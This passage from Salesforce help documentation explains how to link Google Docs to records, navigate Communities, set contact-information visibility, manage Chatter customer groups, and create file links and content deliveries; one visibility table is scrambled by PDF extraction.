2. Choose Add Existing from the Add Google Doc drop-down button in the Google Docs, Notes, & Attachments or Google
Docs & Attachments related list. If the related list contains a Google doc, you can also click Edit next to the Google doc.

3. Click Get the browser button at the bottom of the page.

Note:  Because Customer Portal and partner portal users do not have access to the Google Docs, Notes, & Attachments
or Google Docs & Attachments related list in the portal, portal users can only obtain the browser button from the
Contribute tab in Salesforce CRM Content.

If you use more than one type of browser, for example Microsoft® Internet Explorer and Mozilla® Firefox, install the browser
button in each browser. Google Chrome™ is not supported for the browser button. The instructions for installing the browser
button depend on your browser. In Firefox, drag the browser button to your Bookmarks Toolbar. In Apple® Safari, drag the
browser button to your Bookmark Bar. In Internet Explorer:

Note:  The instructions may vary slightly based on your version of Internet Explorer.

1. Right-click the browser button and choose Add to Favorites... from the Add Google Doc to Salesforce page.
2. Save the browser button in the Links folder and click Add.
3. In your browser menu bar, click View > Toolbars and ensure that the Links toolbar is visible.
4. Close and restart your browser. The browser button displays in your Links toolbar.
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Note:  If you change your personal language setting in Salesforce and want to change the language on the browser
button also, you must delete and reinstall the browser button.

See Also:
Adding Google Docs to Salesforce
Associating Google Docs with Salesforce Records

Using Google Docs in Salesforce
Available in: All Editions except Database.com

User Permissions Needed

“Read” on the appropriate record type

AND

Google Apps account

Using Google Docs in Salesforce

Use Google Docs™ to create and share on-demand documents, presentations, and spreadsheets (“Google docs”) and see your
changes in real time as you collaborate with other users. Because your content is stored within Google, there is no need to
manage versions or send attachments by email—simply log in with your Google Apps account and view the current document
or its revision history.

Salesforce and Google Apps allows you to integrate Google Docs with Salesforce. The Docs home page in your Google Apps
account lists all the Google documents, presentations, and spreadsheets that you have created or that other Google Apps users
have shared with you.

For information about Google Docs, refer to Google's online help.
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Adding Google Docs to Salesforce
Available in: All Editions except Database.com

User Permissions Needed

“Edit” on the appropriate record type

AND

Google Apps account

Creating a Google doc and linking it to Salesforce records:

Note: To use a Google Apps service in Salesforce, you must be logged in to your Google Apps business account.
Business accounts use your organization's domain; for example, john.doe@company.com. If you are unsure of your
Google Apps username and password, contact your administrator.

Salesforce offers three methods for creating new Google docs and associating them with Salesforce records:

• You can create a Google doc from any detail page. The doc is automatically associated with the record and is visible to
anyone with access to both the record and the Google doc.

• You can create a Google doc from the Docs home page in your Google Apps account and associate the doc to one or more
Salesforce records or Salesforce CRM Content libraries using the Add Google Doc to Salesforce browser button.

• If Salesforce CRM Content is enabled, you can create a Google doc from the Contribute tab to associate it with a Salesforce
CRM Content library.

Tip:  For information about using Google Docs, refer to Google's online help.

Adding New Google Docs to a Salesforce Record

1. Display the record you want linked to the new Google doc.
2. On the Google Docs, Notes, & Attachments related list or the Google Docs & Attachments related list, click Add Google

Doc and choose New Document, New Spreadsheet, or New Presentation.
3. To create a blank Google doc:

a. After choosing a doc type from the Add Google Doc drop-down button, choose Create as a blank document,
Create as a blank spreadsheet, or Create as a blank presentation. The name of the radio button
depends on which type of Google doc you chose to create.

b. Enter a name for the document, spreadsheet, or presentation.
c. Click Create Google Doc. The blank document displays with the name you assigned. You can begin editing your doc;

it is automatically associated with the selected record.

Tip:  While you have your Google doc open, remember to share it with other Google Apps users in your
organization. Only users with access to the Google doc in their Google Apps account can view the doc from
the record detail page.

4. To create a new Google doc by converting another file format to Google Docs:
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a. After choosing a doc type from the Add Google Doc drop-down button, choose Create using an existing
file.

b. Select the file you want to convert. Salesforce can convert the following file types to Google docs:

• Microsoft Word® (doc), text (txt), rich text format (rtf), OpenDocument text (odt), or StarOffice® document (swx)
files up to 500 KB each

• Microsoft Excel® (xls), comma-separated value (csv), or OpenDocument spreadsheet (ots) files up to 1 MB each
• Microsoft PowerPoint® (ppt or pps) files up to 10 MB each

c. Enter a name for the document, spreadsheet, or presentation.
d. Click Create Google Doc. The file you uploaded is converted to a Google document, presentation, or spreadsheet.

You can begin editing your doc; it is automatically associated with the selected record.

Tip:  While you have your Google doc open, remember to share it with other Google Apps users in your
organization. Only users with access to the Google doc in their Google Apps account can view the doc from
the record detail page.

To link an existing Google doc to a record, see Editing Google Doc Links on page 2464.

Creating Google Docs from the Docs Home Page

The Docs home page in your Google Apps account lists all the Google docs you have created with your Google Apps account
or that other users have shared with your account. You can access the Docs home page by logging into your Google Apps
account and navigating to the Docs home page. If the Add Google Doc to Salesforce browser button is installed in your
browser, create a Google doc and click the browser button to associate the Google doc with Salesforce records or libraries.
For more information, see Associating Google Docs with Salesforce Records on page 2462.

Adding New Google Docs to a Salesforce CRM Content Library

Create a new Google doc and publish it into a library, sharing that document with other members of that library.

1. On the Libraries tab, choose New Document, New Spreadsheet, or New Presentation from the Add Google Doc
drop-down button. You may be prompted to log in to Google Apps.

2. Enter a name for your document, spreadsheet, or presentation and click Create Google Doc. The blank Google doc opens
and you can begin adding your text. The Save or Publish Content dialog in Salesforce CRM Content also opens.

3. In the Save or Publish Content dialog:

a. Optionally, provide a description of your Google doc. The description provides at-a-glance information for users who
view the doc's content details page in Salesforce CRM Content.

b. Choose a library. If you do not want to put the doc in a public library, for example if the doc is still in progress, choose
Save in my personal library.

c. Optionally, choose a language. The Language drop-down list is displayed if multi-language support is enabled. If you
do not choose a language, Salesforce CRM Content associates your content with your personal language setting. If
users restrict their content searches to a particular language, only content associated with that language is displayed in
the search result set.

d. To publish the content on behalf of another author, choose that author from the drop-down list.
e. Tag your content. Your tagging permission depends on the tagging rule assigned to the library:

• If the library does not have a tagging rule or if your administrator assigned the open tagging rule, you can enter tags
in the Tags field. As you type a tag, Salesforce CRM Content autosuggests tags based on your My Recent Tags
list and the Popular Tags section on the Libraries tab. The My Recent Tags list on the Contribute window shows
the 20 tags you have used most recently. Click a tag to add it to the Tags field automatically.
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• If your administrator assigned the guided tagging rule, you can choose from the list of suggested tags or enter a new
tag. Click a suggested tag to add it to the Tags field automatically.

• If your administrator assigned the restricted tagging rule, you must choose from the list of suggested tags. When
you select a tag it turns green.

• You can't change or delete tag names. You can remove tags from a document, but that doesn't delete the tag.
• Tags are case insensitive. You can't have two tags with the same name even if they use different upper and lowercase

letters. The case of the original tag is always used.

f. If multiple content types are available, choose one from the drop-down list. The content type determines which custom
fields appear for you to categorize and define your content.

g. After completing any custom fields, click Publish to save the Google doc to its Salesforce CRM Content library, or
click Cancel to save the doc to your personal library. From there you can delete the doc from Salesforce CRM Content
or publish it later. Once a Google doc is published in Salesforce CRM Content, all library members can search for the
doc and provide feedback such as comments and votes.

Note:  While you have your Google doc open, remember to share it with other Google Apps users in your organization.
Only users with access to the Google doc in their Google Apps account can open the doc from Salesforce CRM
Content.

See Also:
Using Google Docs in Salesforce
Contributing Google Docs to Salesforce CRM Content
Installing the Add Google Doc to Salesforce Browser Button

Associating Google Docs with Salesforce Records
Available in: All Editions except Database.com

User Permissions Needed

“Read” on the appropriate record type

AND

Google Apps account

Associating a Google doc with a Salesforce record:

When you create, edit, or view a Google doc from your online Docs home page in your Google Apps account, click the Add
Google Doc to Salesforce browser button to associate the Google doc with one or more Salesforce records.

If Salesforce CRM Content is enabled in your organization, you can also add the Google doc to a Salesforce CRM Content
library. Including Google docs in Salesforce CRM Content allows users to access all types of content from a single location
and apply Salesforce CRM Content functionality, such as votes, comments, and subscriptions, toGoogle docs.

To associate a Google doc with Salesforce records from the Docs home page:

1. Open a Google doc.
2. Click the Add Google Doc to Salesforce browser button.
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3. In the Add Google Doc To field, enter your search criteria for the Salesforce record.
4. Select an object type from the drop-down list and click Search.
5. Optionally, filter your search results with the Limit to items I own checkbox.
6. In the search results, select one or more records and click Add Google Doc to Selected Records. You can also click any

of the fields in the search-results list to view more information about the record(s).

To associate a Google doc with Salesforce CRM Content from the Docs home page:

1. Open a Google doc.
2. Click the Add Google Doc to Salesforce browser button.
3. In the Salesforce CRM Content message window at the top of the page, click Publish your Google Doc into Salesforce

CRM Content. The message only displays if you are a member of a Salesforce CRM Content library and have a library
permission that allows you to contribute content.

4. In the Describe and Publish window, add a title for your Google doc and, optionally, a description.
5. Choose a library.
6. Optionally, choose a language. The Language drop-down list is displayed if multi-language support is enabled. If you do

not choose a language, Salesforce CRM Content associates your content with your personal language setting. If users
restrict their content searches to a particular language, only content associated with that language is displayed in the search
result set.

7. To publish the content on behalf of another author, choose that author from the drop-down list.
8. Tag your content. Your tagging permission depends on the tagging rule assigned to the library:

• If the library does not have a tagging rule or if your administrator assigned the open tagging rule, you can enter tags in
the Tags field. As you type a tag, Salesforce CRM Content autosuggests tags based on your My Recent Tags list and
the Popular Tags section on the Libraries tab. The My Recent Tags list on the Contribute window shows the 20 tags
you have used most recently. Click a tag to add it to the Tags field automatically.

• If your administrator assigned the guided tagging rule, you can choose from the list of suggested tags or enter a new
tag. Click a suggested tag to add it to the Tags field automatically.

• If your administrator assigned the restricted tagging rule, you must choose from the list of suggested tags. When you
select a tag it turns green.

• You can't change or delete tag names. You can remove tags from a document, but that doesn't delete the tag.
• Tags are case insensitive. You can't have two tags with the same name even if they use different upper and lowercase

letters. The case of the original tag is always used.

9. If multiple content types are available, choose one from the drop-down list. The content type determines which custom
fields appear for you to categorize and define your content.

10. After completing any custom fields, click Publish. All library members can now search for this doc and provide feedback
such as comments and votes.

Note:  While your Google doc is open, remember to share it with other Google Apps users in your organization.
Only Google Apps users with whom the doc is shared can view and edit the doc.

See Also:
Contributing Google Docs to Salesforce CRM Content
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Editing Google Doc Links
Available in: All Editions except Database.com

User Permissions Needed

“Read” on the appropriate record type

AND

Google Apps account

Editing Google doc links:

Note: To use a Google Apps service in Salesforce, you must be logged in to your Google Apps business account.
Business accounts use your organization's domain; for example, john.doe@company.com. If you are unsure of your
Google Apps username and password, contact your administrator.

You can associate an existing Google doc with a Salesforce record by adding the name and URL of that Google doc to the
record. An existing Google doc is one that you already have access to on your Google Apps account but is not already associated
with the record you are viewing.

Note:  To add an existing Google doc to a Salesforce CRM Content library, see Contributing Google Docs to
Salesforce CRM Content on page 2437.

To add an existing Google doc to a record:

1. Display the record you want to associate with the Google doc.
2. On the Google Docs, Notes, & Attachments or Google Docs & Attachments related list, click Add Google Doc and

choose Add Existing.
3. Enter a Name for the Google doc and its URL.
4. Click Save.

Tip:  You can find the URL by clicking Take me to Google Docs.

Once a Google doc is associated with a Salesforce record, clicking Edit next to that doc on the Google Docs, Notes, &
Attachments or Google Docs & Attachments related list displays the Add Existing Google Doc page. Modify the Name and
URL as needed.

Tip:  For information about using Google Docs, refer to Google's online help.

See Also:
Associating Google Docs with Salesforce Records
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COLLABORATE WITH PARTNERS AND CUSTOMERS

COMMUNITIES

Salesforce Communities Overview
Communities are branded spaces for your employees, customers, and partners to connect. You can customize and create
communities to meet your business needs, then transition seamlessly between them.

Available in: Unlimited, Developer, Enterprise Editions

Watch a Demo: Setting Up Your Salesforce Community (5:59 minutes)

Communities are a great way to share information and collaborate with people outside your company who are key to your
business processes, such as customers or partners.

You can use Communities to:

• Drive more sales by connecting your employees with your distributors, resellers, and suppliers

• Deliver world-class service by giving your customers one place to get answers

• Manage social listening, content, engagement, and workflow all in one place

You can create multiple communities within your organization for different purposes. For example, you could create a customer
support community to reduce support costs, or a channel sales community for partner deal support, or you could have a
community specifically dedicated to an upcoming event.

Communities may contain a subset of features and data available in your internal Salesforce organization and can be customized
to use your company branding. In addition, you can choose which members from your company and which customers, partners,
or other people outside your company can join.

Communities live inside your organization and are easily accessed from a drop-down menu in the top left corner of Salesforce.
Use this menu to switch between your communities and your internal Salesforce organization.

See Also:
Creating Communities
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Navigating to Communities
Available in: Unlimited, Developer, Enterprise Editions

You can easily switch between working in your internal organization and collaborating with customers or partners in
communities. When your organization turns on Communities, you see a new global header unless your administrator has
chosen to hide it.

The menu on the left side lets you switch between communities and your internal organization.

• To access communities from within your organization, click  next to Organization Name in the drop-down and select
the community you want to switch to.

• To return to your internal organization, click  next to Community Name in the drop-down and select your organization
name.

Internal users who aren’t members of any community just see the company name. External users see the drop-down menu
only if they belong to more than one community.

You can work in more than one community at a time if you open each one in a different browser tab.

Switching between your internal organization and your communities doesn’t have to disrupt your workflow. We automatically
return you to the page where you were last working, so you can pick up right where you left off.

Note:  If your organization is in the process of setting up My Domain but hasn’t finished deployment of the new
custom domain, switching from a community to your internal organization directs you to the Salesforce login page
instead. This can happen when you’ve logged in using a My Domain URL that has been registered but not yet
deployed. Once your domain is deployed, selecting your organization in the drop-down directs you to the internal
organization as expected.

The Your Name menu on the right side contains links to edit your contact information and log out. For internal users, it also
contains a link to Help & Training and may also contain links to Setup and other tools depending on user permissions and
enabled features.

2466

Navigating to CommunitiesCommunities



Sharing Personal Contact Information within Communities
Users can specify how much of the contact information from their profile is visible to external users, such as customers and
partners, and guest users viewing publicly accessible pages that don’t require login.

When interacting with other community members, it’s important to balance being visible and accessible with protecting your
personal contact information. You may not want to show your job title, phone numbers, and other contact details outside of
your internal organization. Your customers and partners may not want other customers and partners viewing all of their contact
information.

Use either the user interface or API to control visibility. In the global header, click Your Name > Edit Contact Info to edit
your contact information and visibility settings. Some fields allow up to three levels of visibility, while others allow fewer.

• Employees—Only members from the internal organization can view.
• External—Members from the internal organization and external members, such as customers and partners, can view.

External users are users with Community, Customer Portal, or partner portal licenses.
• Public—Anyone can view, including guest users viewing publicly accessible pages that don’t require login. Guest users can

access public Site.com and Force.com sites, and public pages in Communities, via the Guest User license associated with
each site or community.

In the API, setting a field to true on the User object makes it visible to the type of user indicated in the field name (external
or guest users).

Consider these tips about the visibility of your contact information.

• Your chosen settings apply to every community you’re a member of.
• When a user is restricted from viewing a contact information field, there are differences in what’s displayed in the user

interface versus the API.

◊ In the user interface, the restricted field is hidden from your profile everywhere that it usually displays in a community.
If your organization displays your profile information on custom Visualforce pages, the field still displays, but with the
value #N/A.

◊ In the API, a field set to false returns the value #N/A.

• Information in hidden fields on a profile is not searchable by other partners and customers in the community, but is
searchable by users in the company’s internal organization.

Default Visibility Settings for Contact Information

This table summarizes the default visibility settings for contact information and your options for restricting visibility.

API Controls on User ObjectOptions for
Restricting
Visibility

Where to Set in
User Interface

Default
Visibility

Contact
Information

N/ANone—always
visible to everyone

Go to Your
Name > Edit

PublicFirst Name

Last Name unless yourContact Info,
then click AboutNickname administrator

customizes what
displays using
Visualforce or
Site.com
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API Controls on User ObjectOptions for
Restricting
Visibility

Where to Set in
User Interface

Default
Visibility

Contact
Information

UserPreferencesShowTitleToExternalUsers

UserPreferencesShowTitleToGuestUsers

Employees,
external, or public

Go to Your
Name > Edit
Contact Info,
then click About

ExternalTitle

Note:  When the guest user preference is set to
true, the job title field is visible to external
members even if the external member preference
is set to false.

UserPreferencesShowProfilePicToGuestUsersExternal or publicOn your profile
page, click

External.
Users

Profile photo

Update underwithout
your photo (oraccess
Add Photo if yousee the
haven’t added astock

photo. photo yet), then
select Show in
communities
with publicly
accessible
pages

Employees,
external, or public

Go to Your
Name > Edit
Contact Info,

EmployeesCity

State

Zip/Postal Code

Note:  For each pair of preferences controlling
the visibility of a field, when the guest user
preference is set to true, the field is visible to
external members even if the external member
preference is set to false.

then click
ContactCountry

UserPreferencesShowCityToExternalUsers

UserPreferencesShowCityToGuestUsers

UserPreferencesShowCountryToExternalUsers

UserPreferencesShowCountryToGuestUsers

UserPreferencesShowPostalCodeToExternalUsers

UserPreferencesShowPostalCodeToGuestUsers

UserPreferencesShowStateToExternalUsers

UserPreferencesShowStateToGuestUsers

UserPreferencesShowEmailToExternalUsers

UserPreferencesShowFaxToExternalUsers

Employees or
external

Go to Your
Name > Edit
Contact Info,

EmployeesAll other fields

UserPreferencesShowManagerToExternalUsersthen click
Contact or
About UserPreferencesShowMobilePhoneToExternalUsers

UserPreferencesShowStreetAddressToExternalUsers

UserPreferencesShowWorkPhoneToExternalUsers
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CHATTER CUSTOMER GROUPS

About Chatter Customers in Private Groups
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Chatter customers are users outside your company's email domains who can only see groups they're invited to and interact
with members of those groups; they can't see any Salesforce information.

Chatter customers:

• Can only be added to Chatter if:

◊ A manager or owner of a group that allows customers invites them to the group.

◊ An administrator adds them in Setup by clicking Manage Users > Users.

• Can only see:

◊ Groups they belong to.

◊ People in groups they belong to. Customers only see limited profiles including photo, name, title, email, activity statistics
and influence, common group memberships, and common files. They can't post to profiles.

◊ Files shared to groups they belong to.

• Can't see:

◊ Records or other Salesforce information, even in search results.

◊ Topics, including topics in the feed, the topics list, topic detail pages, Recently Talked About, and Trending Topics.
(Customers can see hashtag (#) topics.)

◊ Recommendations and can't be recommended to others. Additionally, groups that allow customers can't be recommended.

• Are identified as a customer in profiles and groups they belong to. Customers and groups with customers are easily identified
by the orange upper left corner of their photo.

• Have limited profiles, including name, photo, title, company, email, activity statistics and influence, feed, group membership,
and file ownership.

• Can't be followed. Additionally, customers can't follow people or files.

• Can be group members and managers. If the customer is a manager, they will be able to see users who request to join the
group, even if they aren't in other common groups, and approve requests.

• Can't own, create, delete, moderate, join, or ask to join groups.

• Can invite people that they're in common groups with to join groups that they manage.

• Can't invite people inside your company's domain whose profiles they can't see.

• Can’t chat on page 2392 with other users.

Note:  Custom domains created using My Domain aren’t supported with customer invitations. If you’re using a
custom domain or IP restrictions and want to allow customer invitations, we recommend adding a link to the custom
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domain login page redirecting customers to https://login.salesforce.com, or require customers to log in
using single sign-on..

Note:  When you invite someone as a customer to your group, they are given a unique username and password to log
in to this group within your organization, even if they’re already a member of another Salesforce organization. They
will not be able to use other Salesforce logins to access your customer group. If a customer has an issue logging in to
the group, verify that they are using the username and password from the welcome email they received after registering
for the group.

If a customer loses their password, they can use the Forgot Password option to reset it. If they don’t have their
username, they should contact the administrator of the organization in which they’re a customer to recover it.

Considerations for Mobile Users

In the Chatter mobile apps for Android and iOS, the names and profiles of customer users can be viewed by people inside
your company's domain, but customers are prevented from using the apps. Only Chatter for BlackBerry currently allows
customers to log in and use the app. The BlackBerry app applies the same restrictions to customer users as Chatter on the
Web.

See Also:
Chatter Groups Overview
Adding or Removing Customers in Chatter Groups

Adding or Removing Customers in Chatter Groups
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

If customer invitations are enabled for your organization, you can add, remove, and invite customers in private groups you
own or manage that allow customers.

Note:  When you invite someone as a customer to your group, they are given a unique username and password to log
in to this group within your organization, even if they’re already a member of another Salesforce organization. They
will not be able to use other Salesforce logins to access your customer group. If a customer has an issue logging in to
the group, verify that they are using the username and password from the welcome email they received after registering
for the group.

If a customer loses their password, they can use the Forgot Password option to reset it. If they don’t have their
username, they should contact the administrator of the organization in which they’re a customer to recover it.

1. Navigate to a group detail page.
2. To add people who aren't already customers in your company, click Invite People, or Add/Remove Members > Invite

them to Salesforce Chatter!. Enter email addresses separated by commas, and an optional message, and click Send.

Note:  When someone accepts your invitation, they join Chatter and become a member of the group. If you’re
unable to invite customers (people outside your company’s email domains) to private groups you own or manage,
contact your administrator.
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3. To add people who are already customers in your company, click Add/Remove Members, then:

• Search using the Find People search box.
• Toggle between Members of the group and Everyone in your company.
• Use the Next and Previous links to see more of the list.

• Click Add to add a customer, or  to remove a customer.
• Click Done when you're finished.

See Also:
Adding and Removing Chatter Group Members
Viewing Chatter Group Members

Sharing Files via Link
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Share a file with anyone by creating a file link and sending it via email or IM. Creating a link generates an encrypted URL
that you can send to any recipient, such as leads, customers, partners, and coworkers, inside or outside of your company. When
your recipients click the link, they see a web-based version of the file that they can easily view and download. Sharing via link
is on by default for most organizations that have Chatter. Administrators can enable sharing via link by enabling these
permissions:

1. From Setup, click Customize > Content Deliveries > Settings. Select Enable content deliveries and Enable
Chatter file links.

2. From Setup, click Manage Users > Permission Sets. Select a permission set, click System Permissions, and select Create
and Share Links to Chatter Files.

3. From Setup, click Manage Users > Profiles. Select a profile, click Edit. In General User Permissions, select Create
and Share Links to Chatter Files. You don't need this permission for files in a shared Salesforce CRM Content
library. Instead, complete steps 1 and 2 and then ensure the user is a library member and that Deliver Content is checked
in the library permission definition.

Create and share a file link:

1. Start by sharing the file from one of these locations:

• On the Files page—Click Upload a file, click Browse and select a file from your computer, then click Share via link
> Upload.

• On the Home page—Click Create New > File, click Browse and select a file from your computer, then click Share
via link > Upload.

• On a file detail page—Click File Sharing Settings > Via link.
• On the Sharing Settings dialog box—Click Anyone with link from the Share with list.

• Next to the file on the Files page, the Files Owned by list, or the Group Files list—Click  > Share via link.
• Next to the file in a feed or on a file hover—Click More Actions > File Sharing Settings, then click Anyone with link

from the Share with list.
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2. Click Copy if available (or copy the link manually), and paste the link into an email or IM. File link recipients can only
view and download files. They can't be collaborators.

Unless the file was already shared with your company, it's privately shared and displays the privately shared icon ( ). It's not
posted anywhere and only the people you specifically shared it with can find and view it. If it was already shared with your

company, it retains the your company icon ( ) and all Chatter users in your company can find and view it.

On the Sharing Settings dialog box, click  next to a link to stop sharing it. Anyone with the link will no longer be able to
access the file.

Note:

• Files in your Salesforce CRM Content personal library must first be published before they can be shared.

• Web links and Google Docs from Salesforce CRM Content are listed on the Files tab, but can't be shared in
Chatter.

• Documents from the Documents tab and attachments from the Notes and Attachments related list aren't listed
on the Files tab and can't be shared in Chatter.

• The maximum number of times a file can be shared is 100. This includes files shared with people, groups, and
via links. If a file is privately shared and nears the 100 share maximum, consider making the file public by posting
it to your feed.

See Also:
Creating Content Deliveries
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CONTENT DELIVERIES

Creating Content Deliveries
Available in: All Editions except Database.com

Salesforce CRM Content available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer
Editions

User Permissions Needed

Member of the library

AND

“Deliver Content” checked in your library permission
definition

To create content deliveries from a shared library in Salesforce
CRM Content:

“Deliver Uploaded Files and Personal Content” checked in
your general permission definition

To create content deliveries from a personal library inSalesforce
CRM Content:

“Deliver Uploaded Files and Personal Content” checked in
your general permission definition

To create content deliveries (non-Content user):

A content delivery allows you to easily convert documents such as Microsoft® PowerPoint and Word files into an optimized
web-based version for easy online viewing. Once you create your delivery, you can send its encrypted URL to any recipient,
such as leads, customers, partners, and colleagues, and then track how often the content is viewed or downloaded. In addition
to tracking, content deliveries provide several benefits over sending files as attachments, such as giving you control over how
long the delivery is available to viewers and whether a viewer can download a file or see it online only.

A content delivery can be created from the Content Deliveries related list on most Salesforce objects. Salesforce CRM Content
users can also create a content delivery from the content details page or the Related Content related list.

To create a new content delivery:

1. From the Content Deliveries related list, Related Content related list, or the content details page, click Deliver Content.
2. Upload a file or confirm the file name. If you are a Salesforce CRM Content user, search for the content in your libraries

that you want to deliver. Salesforce CRM Content users can search for content in shared libraries or a personal library.
3. Optionally, modify the Delivery Name field. This is the name that identifies your content delivery in Salesforce. We

recommend using a name that will make the delivery easily distinguishable from other deliveries on the same record. The
default delivery name includes the file name and today’s date.

4. Select the delivery methods that determine how your content can be viewed. The options that appear depend on the file
format you uploaded.

• Choose Allow Recipient to View in the Browser to create an online version of the file that recipients can
view in their browser.
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• Choose Allow Recipient to Download as [file type] file to allow the recipient of your content delivery
to view the content in its original format. For example, if you uploaded a Microsoft® Word file, this field will be Allow
download as .doc file.

• Choose Allow Recipient to Download as PDF to create a .pdf version of the file. This option is only available
for Microsoft® PowerPoint, Word, and Excel files.

5. Select Notify Me of First View or Download if you want to receive an email the first time your recipient clicks
the content-delivery URL.

6. If the content you are delivering is time-sensitive, select the Remove Access to Content on checkbox and enter an
expiration date. By default, the expiration date is 90 days from the current date. After creating your content delivery, you
can change the expiration date at any time on the delivery detail page.

7. Optionally, select Require a Password to Access Content. When you create the content delivery you will receive
a password to include with the delivery URL that you send to your recipients. The password is available for the life of the
delivery on the delivery detail page.

8. Optionally, use the lookup to associate your content delivery with a Salesforce record. The record you were viewing when
you clicked Deliver Content is selected by default.

9. Click Save & Next. Your delivery will usually be ready within a few moments, but you can click Notify Me to exit the
content delivery wizard and be notified via email when your content delivery is ready.

10. If you did not exit the content delivery wizard, click Preview to verify that you are satisfied with the delivery.

Important:  Formatting in the original file may not display correctly in the online version. If you chose Allow
Recipient to View in the Browser, preview your content delivery before sending its URL to your
recipients. If you are not happy with the quality of the online version, click Previous and choose to make your
content available in its original file format or a PDF only.

11. Copy and paste the delivery URL and, if applicable, its password into an email or instant message for delivery. The URL
is available on the delivery detail page. For more information, see Viewing and Editing Content Deliveries on page 2475.

See Also:
Sharing Files via Link
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Viewing and Editing Content Deliveries
Available in: All Editions except Database.com

Salesforce CRM Content available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer
Editions

User Permissions Needed

Access to the associated content details page in Salesforce
CRM Content

OR

Access to the record associated with the content delivery

To view the delivery detail page:

Owner of the record

OR

“Modify all Data”

To edit, expire, or delete a content delivery:

On the Content Deliveries related list or the Content Deliveries list page, click the name of a content delivery to open the
detail page.

Viewing Content Delivery Details

The delivery detail page provides all the information associated with a content delivery, including the URL required to
access the content delivery, the number of times the delivery has been viewed, and the delivery settings. For a description
of each field, see Content Delivery Fields on page 2523.

Editing Content Delivery Details

Click Expire Now to immediately remove access to the content delivery. Click Edit to modify details such as the delivery
methods, expiration date, or the record the delivery is associated with. For a description of each field, see Content
Delivery Fields on page 2523.

Deleting Content Deliveries

Click Delete to remove access to the content delivery and delete the delivery record from Salesforce. Salesforce CRM
Content users cannot delete files that are associated with a content delivery until the content delivery is deleted.

Tracking Content Deliveries

Each time a content delivery's URL is opened, Salesforce records the event as a view. The Views related list on the
content delivery detail page lists every view associated with the delivery. Information about the view includes the date
and time, whether the view was by an internal (Salesforce) user, and whether the view included a download. If the content
delivery provided the ability to download the file in its original file format or as a PDF file, the File Downloaded flag
indicates that a download occurred, but you cannot distinguish between file types.

See Also:
Creating and Modifying Content Packs in Salesforce CRM Content
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Using the Content Deliveries Related List
Available in: All Editions except Database.com

User Permissions Needed

NoneTo create a content delivery:

Owner of the record

OR

“Modify all Data”

To edit a content delivery:

A content delivery allows you to easily convert documents such as Microsoft® PowerPoint and Word files into an optimized
web-based version for easy online viewing. Once you create your delivery, you can send its encrypted URL to any recipient,
such as leads, customers, partners, and colleagues, and then track how often the content is viewed or downloaded. In addition
to tracking, content deliveries provide several benefits over sending files as attachments, such as giving you control over how
long the delivery is available to viewers and whether a viewer can download a file or see it online only.

From the Content Deliveries related list on leads, business accounts, contacts, opportunities, cases, campaigns, and custom
objects you can:

• Click Deliver Content to create a new content delivery and associate it with the record you are viewing. For more
information, see Creating Content Deliveries on page 2473.

• Click Preview to open the content delivery. Each time you view a content delivery, it is recorded as one internal view on
the Views related list.

• Click the content delivery name to open the detail page for that delivery. For more information, see Viewing and Editing
Content Deliveries on page 2475.

OTHER RESOURCES

Tip Sheets
In addition to online help, salesforce.com publishes printable documentation to help you learn about our features.

These documents include tip sheets, user guides, and other resources that describe the features and capabilities of Salesforce.
These documents are available as Adobe® PDF files. Adobe Reader® is required to open PDF files; to download the latest
version of Reader, go to www.adobe.com/products/acrobat/readstep2.html.

Chatter Mobile
• Getting Started with Chatter Mobile
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Salesforce CRM Content
• Tips for Using Content Deliveries

Videos for Collaboration
In addition to online help, salesforce.com creates video demos to help you learn about our features.

Chatter

For
Administrators

For End UsersVideo Title

Setting Up Your Salesforce Community (5:59 minutes)

Learn about basic setup of Salesforce Communities, including creating a community,
adding members and tabs, customizing the interface and emails, and previewing
and publishing.

Discover and Organize with Chatter Topics (3:41 minutes)

Use Chatter topics to see what people are talking about, organize the conversations
you want to be a part of, and discover people and groups that are interested and
knowledgeable in the same areas.

Enhancing Your Chatter Posts (1:10 minutes)

Learn how to use @mentions and #topics to enhance your Chatter posts.

Sending Private Chatter Messages (3:15 minutes)

Learn how to communicate privately in Chatter using messages.

Sharing Files in Chatter (2:45 minutes)

Sharing files has never been easier. Learn how to upload and share files at one time,
share files with a Chatter message, perform actions from file hovers, and share files
with anyone inside or outside of your company by sending them a secure link.

Using Chatter Groups (2:16 minutes)

With Chatter Groups you can invite people outside your company to safely
collaborate with you and your group members. Consultants, partners, board
members... now you can select anyone to join you on Chatter!

Using Smart Search (2:12 minutes)

Watch this short video to see how you can find what you need quickly and easily,
in Salesforce Chatter, using smart search.
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For
Administrators

For End UsersVideo Title

Getting the Most Out of Chatter Feeds (2:32 minutes)

Use Salesforce Chatter to create posts, polls, and bookmarks to collaborate effectively
with your coworkers in Chatter. You learn how to post to your followers or a group,
bookmark a post so you can find it later, and how to create a poll on the fly so you
can gather results fast!

Using Chatter in Apex to Display Two Chatter Feeds in a Visualforce Page
(6:00 minutes)

Learn how easy it is to use Chatter in Apex to get Chatter feeds for your Salesforce
Communities and display them side by side in Salesforce. Use the Developer
Console to create an Apex custom controller, a Visualforce custom component,
and a Visualforce page.

Chatter.com

For
Administrators

For End UsersVideo Title

Moderating Your Chatter.com Network (2:40 minutes)

Learn how to moderate your Chatter.com network by assigning moderator privileges
to users, deactivatjng users, and deleting posts.

Finding What You Need In Chatter (2:36 minutes)

Learn how to use features like filters, search, notifications, and Chatter Favorites
to find important information in Chatter.com.
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Welcome, Collaboration Tool Administrators
This documentation contains everything you need to help your users collaborate with each other, or even with people outside
your organization. Learn how to set up and extend Chatter, or enable users to create, package and send files outside your
organization using Salesforce CRM Content. For help with basic Salesforce administration, see Set Up Your Organization.

CHATTER

Setting Up Chatter
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions

The Chatter user interface, Chatter Invitations, and Chatter Recommendations are not available in Database.com.

User Permissions Needed

“Customize Application”To enable Chatter:

To set up Chatter, an administrator must:

1. Enable and configure Chatter.
2. Turn on coworker invitations so that users can invite coworkers without Salesforce licenses to join Chatter for your

organization.
3. Customize feed tracking for objects and fields tracked in Chatter feeds.
4. Optionally add the People, Profile, and Groups tabs to standard and custom apps so users can see these tabs in their apps.

Note:  The Chatter, People, Profile and Groups tabs are available by default in the Chatter app.

5. Optionally, populate the Manager user field for each user.

SET UP AND MAINTAIN
